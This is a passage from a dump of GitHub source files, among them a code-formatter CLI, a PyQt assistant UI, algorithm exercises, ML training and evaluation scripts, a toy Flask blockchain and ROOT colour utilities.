not passing --check, all files not failing will be correctly reformatted\n (i.e. 
globality-black is independently applied per-file)\n\n \\b\n * verbose:\n If --verbose not passed (or --no-verbose), only files with errors or to be modified are\n shown\n\n \\b\n * diff:\n If --diff, do not modify the files and display the changes induced by reformatting\n\n \"\"\"\n\n path = Path(path)\n exit_code = 0\n if diff:\n check = True\n if path.is_dir():\n paths = list(path.glob(\"**/*.py\"))\n else:\n paths = [path]\n\n reformatted_count, failed_count = 0, 0\n process_path_with_check = partial(process_path, check_only_mode=check, diff_mode=diff)\n\n parallelize = len(paths) > NUM_FILES_TO_ENABLE_PARALLELIZATION\n if parallelize:\n with mp.Pool(mp.cpu_count() - 1) as pool:\n map_result = pool.map(process_path_with_check, paths)\n else:\n # Do not parallelize if just a few files\n map_result = map(process_path_with_check, paths)\n\n for is_modified, is_failed, message in map_result:\n if verbose or is_modified or is_failed:\n click.echo(message)\n reformatted_count += is_modified\n failed_count += is_failed\n\n unchanged_count = len(paths) - reformatted_count - failed_count\n\n # add a separator line\n click.echo(\"-\" * len(OH_NO_STRING))\n\n # if we are just checking and at least one file needs to be reformatted OR some file failed\n if (check and reformatted_count > 0) or failed_count > 0:\n click.echo(OH_NO_STRING)\n exit_code = 1\n if failed_count > 0:\n click.echo(f\"{failed_count} files failed to parse (black error)\")\n else:\n click.echo(ALL_DONE_STRING)\n\n if check:\n if reformatted_count > 0:\n click.echo(f\"{reformatted_count} files would be reformatted\")\n if unchanged_count > 0:\n click.echo(f\"{unchanged_count} files would be left unchanged\")\n else:\n if reformatted_count > 0:\n click.echo(f\"{reformatted_count} files reformatted\")\n if unchanged_count > 0:\n click.echo(f\"{unchanged_count} files unchanged\")\n\n sys.exit(exit_code)\n\n\ndef process_path(\n path: Path,\n check_only_mode: bool = False,\n diff_mode: bool = False,\n) -> Tuple[bool, bool, str]:\n \"\"\"\n For each path compute `is_modified`, `is_failed`, and `message` to be used in main\n \"\"\"\n\n is_modified = False\n input_code = path.read_text()\n black_mode = get_black_mode(path)\n diff_output = \"\"\n try:\n output_code = reformat_text(input_code, black_mode)\n except BlackError as e:\n return False, True, f\"Failed to reformat {path}. 
{e}\"\n\n if input_code != output_code:\n is_modified = True\n\n if check_only_mode and is_modified:\n if diff_mode:\n diff_output = text_diff(path, output_code)\n diff_output = f\"\\nDiff for {path} \\n\" + diff_output\n initial_str = \"Would reformat\"\n elif not check_only_mode and is_modified:\n initial_str = \"Reformatted\"\n else:\n initial_str = \"Nothing to do for\"\n\n if not check_only_mode:\n path.write_text(output_code)\n if diff_mode:\n # if diff we add the diff report to the reformat message\n output = diff_output + \"\\n\" + f\"{initial_str} {path}\"\n else:\n output = f\"{initial_str} {path}\"\n return is_modified, False, output\n\n\nif __name__ == \"__main__\":\n sys.exit(main()) # type: ignore # pragma: no cover\n","repo_name":"tpietruszka/globality-black","sub_path":"globality_black/cli.py","file_name":"cli.py","file_ext":"py","file_size_in_byte":5072,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"4286718447","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon May 21 20:41:38 2018\n\n@author: Benjamin Rosa\n\"\"\"\nimport sys\nimport Constants\nfrom PyQt5.QtCore import pyqtSlot, Qt\nfrom PyQt5.QtWidgets import QWidget, QPushButton, QDesktopWidget, QApplication, QListWidget, QLabel\nfrom CommandThread import StartActionThread\nfrom Util import JsonFileUtil\nfrom Speaker import AssistantSpeaker\n\n# This class setup the UI part of the application\nclass AssistantApp(QWidget):\n \n def __init__(self, app):\n super().__init__()\n self.title = 'Personal Assistant'\n self.left = 10\n self.top = 10\n self.width = 310\n self.height = 250\n self.command_thread = StartActionThread()\n self.command_thread.signal.connect(self.on_thread_finished)\n self.speaker = AssistantSpeaker()\n self.app = app\n self.initUI()\n \n def initUI(self):\n # Initialize window running the app\n self.setWindowTitle(self.title)\n self.setGeometry(self.left, self.top, self.width, self.height)\n \n # Start the application at the center of the screen\n qtRectangle = self.frameGeometry()\n center_point = QDesktopWidget().availableGeometry().center()\n qtRectangle.moveCenter(center_point)\n self.move(qtRectangle.topLeft())\n \n # Initialize start button\n self.start_button = QPushButton('Speak', self)\n self.start_button.resize(250, 50)\n self.start_button.move(30,180)\n self.start_button.setStyleSheet('font:bold;font-size:30px;')\n self.start_button.clicked.connect(self.on_start_click)\n \n # Command list title\n self.command_list_title = QLabel(\"Command list\", self)\n self.command_list_title.setStyleSheet('font:bold;font-size:30px;')\n self.command_list_title.resize(250,50)\n self.command_list_title.move(20,5)\n self.command_list_title.setAlignment(Qt.AlignCenter)\n\n # Command list\n self.commandList = QListWidget(self)\n self.commandList.resize(150,110)\n self.commandList.move(75,60)\n self.commandList.addItem(\"All commands\")\n self.commandList.addItem(\"Change parameters\")\n self.commandList.addItem(\"Weather\")\n self.commandList.addItem(\"Time\")\n self.commandList.addItem(\"Save meeting\")\n self.commandList.addItem(\"Remind meetings\")\n self.commandList.addItem(\"Help\")\n \n self.welcomingUser()\n self.show()\n \n def closeEvent(self, event):\n sys.exit(self.app.exec_())\n \n def on_thread_finished(self):\n self.start_button.setEnabled(True)\n QApplication.setOverrideCursor(Qt.ArrowCursor)\n self.command_thread.terminate()\n self.command_thread = StartActionThread()\n 
self.command_thread.signal.connect(self.on_thread_finished)\n \n @pyqtSlot()\n def on_start_click(self):\n self.start_button.setEnabled(False)\n QApplication.setOverrideCursor(Qt.WaitCursor)\n self.command_thread.start()\n \n def welcomingUser(self):\n jsonFile = JsonFileUtil(Constants.APP_PROPERTIES_FILENAME, Constants.APP_PROPERTIES_PATH)\n userName = jsonFile.getValue(\"user name\")\n self.speaker.say(\"Welcome \" + userName)\n ","repo_name":"BenjaminBenoit/AssistantVocal","sub_path":"AssistantApp.py","file_name":"AssistantApp.py","file_ext":"py","file_size_in_byte":3265,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"41371480698","text":"import collections\n\ndef ans(words):\n mose = [\".-\",\"-...\",\"-.-.\",\"-..\",\".\",\"..-.\",\"--.\",\"....\",\"..\",\".---\",\"-.-\",\".-..\",\"--\",\"-.\",\"---\",\".--.\",\"--.-\",\".-.\",\"...\",\"-\",\"..-\",\"...-\",\".--\",\"-..-\",\"-.--\",\"--..\"]\n hist = collections.defaultdict(int)\n for w in words:\n rst = \"\"\n for c in w:\n rst += mose[ord(c) - ord('a')]\n hist[rst] += 1\n return len(hist.keys())\n\nclass Solution(object):\n def uniqueMorseRepresentations(self, words):\n \"\"\"\n :type words: List[str]\n :rtype: int\n \"\"\"\n return ans(words)\n","repo_name":"gsrr/leetcode","sub_path":"leetcode/804. Unique Morse Code Words.py","file_name":"804. Unique Morse Code Words.py","file_ext":"py","file_size_in_byte":575,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"38714898712","text":"\"\"\"\nProblem:\n\nGiven a string of parentheses, write a function to compute the minimum number of\nparentheses to be removed to make the string valid (i.e. each open parenthesis is\neventually closed).\n\nFor example, given the string \"()())()\", you should return 1. 
Given the string \")(\",\nyou should return 2, since we must remove all of them.\n\"\"\"\n\nfrom copy import deepcopy\n\nfrom DataStructures.Stack import Stack\n\n\ndef get_min_parentheses_remove(\n expression: str, stack: Stack = Stack(), num_removed: int = 0\n) -> int:\n if not expression and stack.is_empty():\n return num_removed\n elif not expression:\n return len(stack) + num_removed\n if (expression[0] == \")\") and (not stack.is_empty() and stack.peek() == \"(\"):\n stack.pop()\n return get_min_parentheses_remove(expression[1:], stack, num_removed)\n # calulating the modifications for parenthesis added to stack\n stack_copy = deepcopy(stack)\n stack_copy.push(expression[0])\n modifications_parenthesis_added_to_stack = get_min_parentheses_remove(\n expression[1:], stack_copy, num_removed\n )\n # calulating the modifications for parenthesis removed\n modifications_parenthesis_ignored = get_min_parentheses_remove(\n expression[1:], stack, num_removed + 1\n )\n return min(\n modifications_parenthesis_added_to_stack, modifications_parenthesis_ignored\n )\n\n\nif __name__ == \"__main__\":\n print(get_min_parentheses_remove(\"()())()\"))\n print(get_min_parentheses_remove(\")(\"))\n\n\n\"\"\"\nSPECS:\n\nTIME COMPLEXITY: O(2 ^ n)\nSPACE COMPLEXITY: O(n)\n\"\"\"\n","repo_name":"ruppysuppy/Daily-Coding-Problem-Solutions","sub_path":"Solutions/086.py","file_name":"086.py","file_ext":"py","file_size_in_byte":1573,"program_lang":"python","lang":"en","doc_type":"code","stars":444,"dataset":"github-code","pt":"67"} +{"seq_id":"106872774","text":"from model import *\nimport torch\n\n\ndef regularized_train(dataloader, model, loss_fn, optimizer, device, lmbda):\n \"\"\"\n\n :param dataloader: training dataloader\n :param model: CNN model\n :param lmbda: penalty strength\n \"\"\"\n\n size = len(dataloader.dataset)\n model.train()\n for batch, (X, y) in enumerate(dataloader):\n X, y = X.to(device), y.to(device)\n X.requires_grad_()\n\n # Compute prediction error\n pred = model(X)\n loss = loss_fn(pred, y)\n\n # Backpropagation and gradient regularization\n optimizer.zero_grad()\n grad = torch.autograd.grad(loss, X, retain_graph=True)[0]\n grad_norm = torch.norm(grad)\n loss += lmbda * grad_norm.mean()\n loss.backward()\n optimizer.step()\n\n if batch % 100 == 0:\n loss, current = loss.item(), (batch + 1) * len(X)\n print(f\"loss: {loss:>7f} [{current:>5d}/{size:>5d}]\")\n\n\nif __name__ == '__main__':\n\n print('Gradients Regularization\\n')\n\n learning_rate = 0.00005\n train_dataloader, test_dataloader, device = init_data()\n regularized_cnn = CNN().to(device)\n regularized_cnn.load_state_dict(torch.load(\"models/regularized_L1000_CNN.pth\"))\n\n loss_fn = nn.CrossEntropyLoss()\n optimizer = torch.optim.Adam(regularized_cnn.parameters(), lr=learning_rate)\n\n lmbda = 1000\n epochs = 10\n for t in range(epochs):\n print(f\"Epoch {t + 1}\\n-------------------------------\")\n regularized_train(dataloader=train_dataloader, model=regularized_cnn, loss_fn=loss_fn, optimizer=optimizer,\n device=device, lmbda=lmbda)\n test(test_dataloader, regularized_cnn, loss_fn, device)\n print(\"Done!\")\n\n # save model\n torch.save(regularized_cnn.state_dict(), \"models/regularized_L1000_CNN.pth\")\n print(\"Saved PyTorch Model State to regularized_L1000_CNN.pth\")\n\n test(test_dataloader, regularized_cnn, loss_fn, device)\n 
print(\"Done!\")\n","repo_name":"GxxxMiii/AdvCNN","sub_path":"gradients_regularization.py","file_name":"gradients_regularization.py","file_ext":"py","file_size_in_byte":1962,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"6280008445","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\ndescription: get-list-of-all-column-headings\nversion: 0.0.1\ncreated: 2018-10-23\nauthor: Ed Nykaza\ndependencies:\n * donor json data\nlicense: BSD-2-Clause\n\"\"\"\n\n\n# %% REQUIRED LIBRARIES\nimport os\nimport sys\nimport pandas as pd\nimport datetime as dt\nimport argparse\nimport time\n# load tidals package locally if it does not exist globally\nimport importlib\nif importlib.util.find_spec(\"tidals\") is None:\n tidalsPath = os.path.abspath(os.path.join(os.path.dirname(__file__),\n \"..\", \"..\", \"tidepool-analysis-tools\"))\n if tidalsPath not in sys.path:\n sys.path.insert(0, tidalsPath)\nimport tidals as td\n\n\n# %% CODE METADATA\nstartTime = time.time()\nprint(\"starting at \" + dt.datetime.now().strftime(\"%Y-%m-%d %H:%M:%S\"))\n\n\n# %% USER INPUTS\ncodeDescription = \"A batch processing or wrapper script to get a list of all column headings\"\nparser = argparse.ArgumentParser(description=codeDescription)\n\nparser.add_argument(\"-d\",\n \"--date-stamp\",\n dest=\"dateStamp\",\n default=dt.datetime.now().strftime(\"%Y-%m-%d\"),\n help=\"date in '%Y-%m-%d' format needed to call unique \" +\n \"donor list (e.g., PHI-2018-03-02-uniqueDonorList)\")\n\nargs = parser.parse_args()\n\n\n# %% SET UP PATHS\ndataPath = os.path.abspath(os.path.join(os.path.dirname(__file__),\n \"..\", \"data\", \"PHI-\" + args.dateStamp + \"-donor-data\"))\n\ndonorInfoPath = os.path.join(dataPath, \"PHI-\" + args.dateStamp + \"-uniqueDonorList.csv\")\ndonors = td.load.load_csv(donorInfoPath)\njsonDataPath = os.path.join(dataPath, \"PHI-\" + args.dateStamp + \"-donorJsonData\")\n\n\n# %% FUNCTIONS\nuniqueColHeadings = set()\ni = 0\nfor dIndex in donors.index:\n userID = donors.userID[dIndex]\n fileName = \"PHI-\" + str(userID)\n jsonFileName = os.path.join(jsonDataPath, fileName + \".json\")\n fileSize = os.stat(jsonFileName).st_size\n if fileSize > 1000:\n i = i + 1\n data = td.load.load_json(jsonFileName)\n uniqueColHeadings = uniqueColHeadings.union(set(list(data)))\n print(i, len(list(uniqueColHeadings)))\n\nallCols = pd.DataFrame(list(uniqueColHeadings), columns=[\"colHeading\"])\nallCols = allCols.sort_values(by=\"colHeading\").reset_index(drop=True)\nallCols.to_csv(\"all-col-headings-\" + args.dateStamp + \".csv\")\n\n\n# %% CODE METADATA\nendTime = time.time()\nprint(\"finshed at \" + dt.datetime.now().strftime(\"%Y-%m-%d %H:%M:%S\"))\nprint(\"total duration was \" + str(round((endTime - startTime) / 60, 1)) + \" minutes\")\n","repo_name":"rpwils/data-analytics","sub_path":"projects/bigdata-processing-pipeline/get-donor-data/get-all-col-headings.py","file_name":"get-all-col-headings.py","file_ext":"py","file_size_in_byte":2586,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"67"} +{"seq_id":"31986912745","text":"#!/usr/bin/env python\n# Cphryigot: O.R.Senthil Kumaran \n#\n# Inrpeisd from jwz scrmable: http://www.jwz.org/hacks/scrmable.pl\n#\n# Tihs pgrarom is fere sortfwae; you can rrtiestiubde it ad/onr mdfioy\n# it udenr the tmers of the GNU Graneel Pbuilc Liscene as phlibsued by\n# the Fere Sfwartoe Fanouiodtn; eeihtr vierosn 2 of the Liscene, or\n# (at your opotin) any leatr vierosn.\n#\n# Tihs 
pgrarom is diisertbtud in the hope taht it will be uusfel,\n# but WTHOIUT ANY WRAANRTY; whitout eevn the iipemld watrarny of\n# MNTIBRAEAHCITLY or FNTIESS FOR A PTULACRIAR PURPSOE. See the\n# GNU Graneel Pbuilc Liscene for mroe dalites.\n#\n# You suolhd have reievced a copy of the GNU Graneel Pbuilc Liscene\n# along wtih tihs pgrarom; if not, wtire to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA\n\nimport random\nimport sys\n\n\ndef mxiup(ecah_wrod):\n if len(ecah_wrod) <= 2:\n return ecah_wrod\n else:\n nwewrod = ecah_wrod[0]\n if ecah_wrod[-1] in ['.', ',', ':', ';', '-', '?', '!']:\n inbet = ecah_wrod[1:-2]\n for each in random.sample(list(inbet), len(inbet)):\n nwewrod += each\n nwewrod += ecah_wrod[-2]\n else:\n inbet = ecah_wrod[1:-1]\n for each in random.sample(list(inbet), len(inbet)):\n nwewrod += each\n nwewrod += ecah_wrod[-1]\n return nwewrod\n\n\ndef srcambel(line):\n mixedwrods = []\n wrods = line.split()\n for ecah_wrod in wrods:\n mixedwrods.append(mxiup(ecah_wrod))\n for w, m in zip(wrods, mixedwrods):\n line = line.replace(w, m)\n print(line, end='')\n\n\ndef getgraparaph():\n line = sys.stdin.read()\n return line\n\n\ndef mian():\n try:\n line = getgraparaph()\n srcambel(line)\n except (EOFError, KeyboardInterrupt):\n sys.exit(0)\n\n\nmian()\n","repo_name":"uthcode/learntosolveit","sub_path":"languages/python/algorithm_scrmable.py","file_name":"algorithm_scrmable.py","file_ext":"py","file_size_in_byte":1875,"program_lang":"python","lang":"en","doc_type":"code","stars":161,"dataset":"github-code","pt":"67"} +{"seq_id":"33731412782","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Jun 25 21:47:06 2020\n\n@author: Bjarne\n\"\"\"\nimport pandas as pd\nimport numpy as np\nimport sys\nsys.path.append(\"..\")\nfrom RequestHandlerData import ORM_Datamodel as ORM\nfrom sklearn.model_selection import GridSearchCV\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.metrics import classification_report\nfrom sklearn.metrics import f1_score\nfrom datetime import datetime\nfrom joblib import dump\nimport MLAlgorithm as MLAlgo\n \nclass DataHandler:\n \n def __init__(self):\n \"\"\"\n The data set is fetched from the database and\n subsequently handed over to the \"Training\" class.\n\n Returns\n -------\n None.\n\n \"\"\"\n # Query the data from the database\n self.X = pd.read_sql_table('Transaction_preprocessed', ORM.connection_string).set_index(\"tx_id\").sort_index()\n self.y = pd.read_sql_table('Transaction_Rating', ORM.connection_string).set_index(\"tx_id\").sort_index()\n \n def FilterData(self):\n \"\"\"\n The data set is filtered because, although the isFraud variable is\n written to the \"Transaction_Rating\" table right after the\n transaction, the \"isFraud\" column is not known at transaction time.\n Entries whose value is not yet known are removed.\n\n Returns\n -------\n None\n\n \"\"\"\n # keep only rows where isFraud is already known; a direct comparison with np.nan never matches\n self.X = self.X[self.y.isFraud.notna()]\n self.y = self.y[self.y.isFraud.notna()][\"isFraud\"]\n \n def SplitData(self):\n \"\"\"\n Perform the train-test split. \n The test data is used for validation, after running\n the grid search. 
This indirectly introduces a three-fold split.\n \n The shuffle=False parameter of train_test_split is used to avoid\n data leakage, e.g. from fraudsters who execute several\n illegal transactions.\n \n Returns\n -------\n None.\n\n \"\"\"\n self.X_train, self.X_test, self.y_train, self.y_test = train_test_split(\\\n self.X, self.y, train_size=0.8, random_state=42,\\\n shuffle=False)\n \n def Process(self):\n self.FilterData()\n self.SplitData()\n \n \nclass Training:\n \n def __init__(self, isTuned, Model, params, DataHandler=DataHandler, threshold=0.5):\n \"\"\"\n This class coordinates the training. It decides whether the model\n is already in its final form or whether parameter tuning still has\n to be performed; the class works with different models and\n parameter grids.\n\n Parameters\n ----------\n isTuned : bool\n Indicates whether parameter tuning is still necessary.\n \n Model : class\n The ML algorithm to be used.\n \n params : dict\n Either the parameter grid, if isTuned == False,\n or the parameters to use for the final model.\n \n DataHandler : class\n The DataHandler class used to process the data.\n \n threshold : float\n The probability cut-off above which a transaction is\n flagged as fraud.\n \n Returns\n -------\n None.\n \"\"\"\n self.isTuned = isTuned\n self.Model = Model\n self.params = params\n self.DataHandler = DataHandler()\n self.threshold = threshold\n # Run data preparation and the split\n self.DataHandler.Process()\n \n def Process(self):\n \"\"\"\n Distinguishes whether the model has already been tuned.\n If not, the grid search is started, which then retrains and\n saves the final model.\n\n Returns\n -------\n None.\n\n \"\"\"\n if self.isTuned == True:\n # Train Model\n model = self.Model(n_jobs=-1, **self.params)\n model.fit(self.DataHandler.X, self.DataHandler.y)\n \n # Save model to storage \n dump(model, './ModelStorage/saved_model.pkl')\n else:\n # If the parameters have not been tuned yet, start the grid search\n self.test = GridSearchTuning(self)\n self.test.Process()\n 
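\n# Usage sketch (illustrative only; RandomForestClassifier and the grid below are\n# hypothetical stand-ins, not part of this project):\n#   from sklearn.ensemble import RandomForestClassifier\n#   trainer = Training(isTuned=False, Model=RandomForestClassifier,\n#                      params={'n_estimators': [100, 200]})\n#   trainer.Process()  # grid search -> validation -> final fit and dump\n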
\nclass GridSearchTuning:\n \n def __init__(self, TrainingInstance,\\\n threshold_metric = 0.98):\n \"\"\"\n \n\n Parameters\n ----------\n TrainingInstance : class\n An instance of the Training class. Parameters are exchanged\n through it and can be modified from this class. It is needed\n to write back the optimal parameter pair.\n \n threshold_metric : float, optional\n Threshold of the target metric: the value a model must reach\n to count as \"good enough\". The default is 0.98.\n\n Returns\n -------\n None.\n\n \"\"\"\n # Copy the parameters from the training instance\n self.TrainingInstance = TrainingInstance\n self.X_train = TrainingInstance.DataHandler.X_train\n self.X_test = TrainingInstance.DataHandler.X_test\n self.y_train = TrainingInstance.DataHandler.y_train\n self.y_test = TrainingInstance.DataHandler.y_test\n self.threshold = TrainingInstance.threshold\n self.Model = TrainingInstance.Model\n self.params = TrainingInstance.params\n \n # We evaluate the model with the F1 score to avoid distortion\n # from imbalanced data.\n # An aggregate metric was chosen deliberately, since false\n # negatives also cause reputational damage.\n self.GridSearch = GridSearchCV(self.Model(), self.params, cv=2, n_jobs=-1, scoring='f1')\n \n # Store the thresholds\n self.threshold_metric = threshold_metric\n \n def ModelSelection(self):\n \"\"\"\n Run the actual parameter tuning and keep the best model\n based on the training dataset.\n\n Returns\n -------\n None.\n\n \"\"\"\n self.GridSearch.fit(self.X_train, self.y_train)\n \n def ModelValidation(self):\n \"\"\"\n Validate the model and accept it, provided the thresholds\n have not been violated. \n \n Returns\n -------\n None.\n\n \"\"\"\n self.validation_model = self.Model(n_jobs=-1, **self.GridSearch.best_params_)\n self.validation_model.fit(self.X_train, self.y_train)\n \n y_pred = self.validation_model.predict_proba(self.X_test)\n # Convert probabilities into a binary decision\n y_pred_binary = [y[1] >= self.threshold for y in y_pred]\n \n # Compute the F1 score \n metric = f1_score(self.y_test, y_pred_binary)\n \n # Create a model report to document model quality transparently\n report = pd.DataFrame(classification_report(self.y_test, y_pred_binary, output_dict=True))\n report.to_csv(f\"./ModelReport/report{str(datetime.now()).replace(':','-')}.csv\")\n\n if self.threshold_metric <= metric:\n # Update the parameters of the training instance\n self.TrainingInstance.isTuned = True\n self.TrainingInstance.params = self.GridSearch.best_params_\n # Train and save the final model\n self.TrainingInstance.Process()\n else:\n raise Exception(\"\"\"Model quality not sufficient. 
Process terminated.\n The existing model will be kept.\"\"\")\n\n def Process(self):\n \"\"\"\n Run the required steps automatically.\n \"\"\"\n self.ModelSelection()\n self.ModelValidation()\n\n","repo_name":"GeorgSchieck/Next-Level-Fraud-Detection","sub_path":"project_code/fraud_detector/RequestHandlerModel/Retrain.py","file_name":"Retrain.py","file_ext":"py","file_size_in_byte":8171,"program_lang":"python","lang":"de","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"42955038043","text":"from runners.common.branch_utils import get_branch_specific_objects\nfrom runners.interface import BaseRunner\n\n\ndef _run_fn(fn, args):\n if isinstance(args, (list, tuple)):\n return fn(*args)\n elif isinstance(args, dict):\n return fn(**args)\n else:\n return fn(args)\n\n\nclass DefaultSiamFCEvaluator(BaseRunner):\n def __init__(self):\n self.data_pipeline_on_host = None\n self.tracker_evaluator = None\n\n self.branch_name = None\n\n def switch_branch(self, branch_name):\n self.branch_name = branch_name\n\n def train(self, is_train):\n assert not is_train, \"Evaluator can only be run in evaluation mode\"\n\n def get_iteration_index(self):\n return None\n\n def get_metric_definitions(self):\n metric_definitions = []\n data_pipelines = get_branch_specific_objects(self, self.branch_name, 'data_pipeline_on_host')\n for data_pipeline in data_pipelines:\n if hasattr(data_pipeline, 'get_metric_definitions'):\n metric_definitions.append(data_pipeline.get_metric_definitions())\n if self.tracker_evaluator is not None:\n if hasattr(self.tracker_evaluator, 'get_metric_definitions'):\n metric_definitions.append(self.tracker_evaluator.get_metric_definitions())\n if len(metric_definitions) == 0:\n metric_definitions = None\n\n return metric_definitions\n\n def run_iteration(self, model, data):\n samples, targets, miscellanies_on_host, miscellanies_on_device = data\n assert self.branch_name is not None\n data_pipeline_on_host = get_branch_specific_objects(self, self.branch_name, 'data_pipeline_on_host')\n tracker_evaluator = get_branch_specific_objects(self, self.branch_name, 'tracker_evaluator')\n\n if data_pipeline_on_host is not None:\n for data_pipeline in data_pipeline_on_host:\n if hasattr(data_pipeline, 'pre_processing'):\n samples, targets, miscellanies_on_host, miscellanies_on_device = data_pipeline.pre_processing(samples, targets, miscellanies_on_host, miscellanies_on_device)\n\n outputs = None\n if tracker_evaluator is None:\n if samples is not None:\n # no tracker evaluator configured: feed the samples straight to the model\n outputs = _run_fn(model, samples)\n else:\n initialization_samples = tracker_evaluator.pre_initialization(\n samples, targets, miscellanies_on_host, miscellanies_on_device)\n tracker_initialization_results = None\n if initialization_samples is not None:\n tracker_initialization_results = _run_fn(model.initialize, initialization_samples)\n tracking_samples = tracker_evaluator.on_initialized(tracker_initialization_results)\n if tracking_samples is not None:\n outputs = _run_fn(model.track, tracking_samples)\n outputs = tracker_evaluator.post_tracking(outputs)\n\n if data_pipeline_on_host is not None:\n for data_pipeline in reversed(data_pipeline_on_host):\n if hasattr(data_pipeline, 'post_processing'):\n outputs = data_pipeline.post_processing(outputs)\n\n def register_data_pipelines(self, branch_name, data_pipelines):\n if 'data_pipeline' in data_pipelines:\n if self.data_pipeline_on_host is None:\n self.data_pipeline_on_host = {}\n if branch_name not in self.data_pipeline_on_host:\n 
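# create this branch's pipeline list the first time it registers one\n 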
self.data_pipeline_on_host[branch_name] = []\n for data_pipeline in data_pipelines['data_pipeline']:\n self.data_pipeline_on_host[branch_name].append(data_pipeline)\n if 'tracker_evaluator' in data_pipelines:\n if self.tracker_evaluator is None:\n self.tracker_evaluator = {}\n assert branch_name not in self.tracker_evaluator\n self.tracker_evaluator[branch_name] = data_pipelines['tracker_evaluator']\n","repo_name":"LitingLin/SwinTrack","sub_path":"runners/evaluation/default.py","file_name":"default.py","file_ext":"py","file_size_in_byte":3928,"program_lang":"python","lang":"en","doc_type":"code","stars":224,"dataset":"github-code","pt":"67"} +{"seq_id":"3380113125","text":"import os\nfrom uuid import uuid4\nfrom flask import Flask, jsonify, request\n\nfrom .cryptocurrency.cryptocurrency import Blockchain\n\napp = Flask(__name__)\n\nnode_address = str(uuid4()).replace('-', '')\n\nblockchain = Blockchain()\n\nminer = os.getenv('MINER')\n\n\n@app.route('/get_chain', methods=['GET'])\ndef get_chain():\n response = {'chain': blockchain.chain, 'length': len(blockchain.chain)}\n return response, 200\n\n\n@app.route('/mine_block', methods=['GET'])\ndef mine_block():\n \"\"\"\n The blockchain is public. In this case everyone has access\n to the chain. If you want to mine it you can.\n \"\"\"\n\n # Access the last item in the chain\n previous_block = blockchain.get_previous_block()\n\n # This is what you need for mining\n previous_proof = previous_block['proof']\n\n # This is the actual mining. Trying to solve a problem.\n # (proof_of_worf is the misspelled method name defined by the Blockchain class)\n proof = blockchain.proof_of_worf(previous_proof)\n\n # With a proof in hand, you are now ready to create a new block\n previous_hash = blockchain.hash(previous_block)\n\n # Add a transaction to your wallet since you are going to mine the block!\n blockchain.add_transaction(\n sender=node_address,\n receiver=miner,\n amount=1\n )\n\n block = blockchain.create_block(proof, previous_hash)\n response = {\n 'message': 'Congratulations on mining a new block!',\n 'index': block['index'],\n 'timestamp': block['timestamp'],\n 'proof': block['proof'],\n 'previous_hash': block['previous_hash'],\n 'transactions': block['transactions']\n }\n\n return jsonify(response), 200\n\n
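\n# Example call (hypothetical host/port; Flask dev-server defaults):\n#   curl http://127.0.0.1:5000/mine_block\n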
\n@app.route('/is_chain_valid')\ndef is_chain_valid():\n return jsonify(blockchain.is_chain_valid(blockchain.chain)), 200\n\n\n@app.route('/add_transaction', methods=['POST'])\ndef add_transaction():\n json = request.get_json()\n transaction_keys = ['sender', 'receiver', 'amount']\n if not all(key in json for key in transaction_keys):\n return 'Missing information elements', 400\n index = blockchain.add_transaction(\n json['sender'],\n json['receiver'],\n json['amount']\n )\n response = {'message': f'This transaction will be added to block {index}'}\n return jsonify(response), 201\n\n\n@app.route('/connect_node', methods=['POST'])\ndef connect_node():\n json = request.get_json()\n nodes = json.get('nodes')\n if nodes is None:\n return 'Empty', 400\n for node in nodes:\n blockchain.add_node(node)\n response = {\n \"message\": \"All following nodes connected:\",\n \"total_node\": list(blockchain.nodes)\n }\n return jsonify(response), 201\n\n\n@app.route('/replace_chain', methods=['GET'])\ndef replace_chain():\n is_chain_replaced = blockchain.replace_chain()\n if is_chain_replaced:\n response = {\n \"message\": \"The chain was replaced\",\n \"new_chain\": blockchain.chain\n }\n else:\n response = {\n \"message\": \"The chain was not replaced\",\n \"chain\": blockchain.chain\n }\n return jsonify(response), 200\n\n\n@app.route('/')\ndef hello_world():\n return 'Hello, as!'\n","repo_name":"ricardomlima/blockchain-development","sub_path":"workplace/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":3104,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"70023417495","text":"\"\"\"Utility classes.\"\"\"\n\nimport ROOT as R\nimport numpy as np\n\n\nclass Color(int):\n \"\"\"Create a new R.TColor object with an associated index.\n https://root-forum.cern.ch/t/how-to-form-a-color-t-from-a-tcolor/25013/2.\n \"\"\"\n\n def __new__(cls, r, g, b, name=\"\"):\n self = int.__new__(cls, R.TColor.GetFreeColorIndex())\n self.object = R.TColor(self, r, g, b, name, 1.0)\n self.name = name\n return self\n\n\nclass ColorFinder:\n \"\"\"Handles color matching with ROOT ones starting from an arbitrary pixel.\"\"\"\n\n def __init__(self, r, g, b):\n self.my_color = np.array((r, g, b))\n self._c = R.TColor()\n\n def match(self):\n \"\"\"Find closest color within ROOT color wheel.\"\"\"\n self._init_wheel()\n\n tmp_dist = 0.0\n match_color = None\n\n for root_color in self._wheel:\n dist = np.linalg.norm(root_color - self.my_color)\n\n if tmp_dist > dist or not type(match_color).__module__ == np.__name__:\n match_color = root_color\n tmp_dist = dist\n\n return self._c.GetColor(match_color[0], match_color[1], match_color[2])\n\n def _init_wheel(self):\n \"\"\"Initialise ROOT color wheel.\"\"\"\n\n self._wheel = []\n\n colors = {\n (-10, 15): [R.kRed, R.kBlue, R.kGreen, R.kMagenta, R.kCyan, R.kYellow],\n (-9, 20): [R.kPink, R.kAzure, R.kSpring, R.kOrange, R.kViolet, R.kTeal],\n (0, 1): [R.kBlack, R.kWhite],\n (0, 4): [R.kGray],\n }\n\n for (shift, window), color_list in colors.items():\n for c in color_list:\n\n self._wheel.extend(\n [\n np.array(\n (\n R.gROOT.GetColor(c + i + shift).GetRed(),\n R.gROOT.GetColor(c + i + shift).GetGreen(),\n R.gROOT.GetColor(c + i + 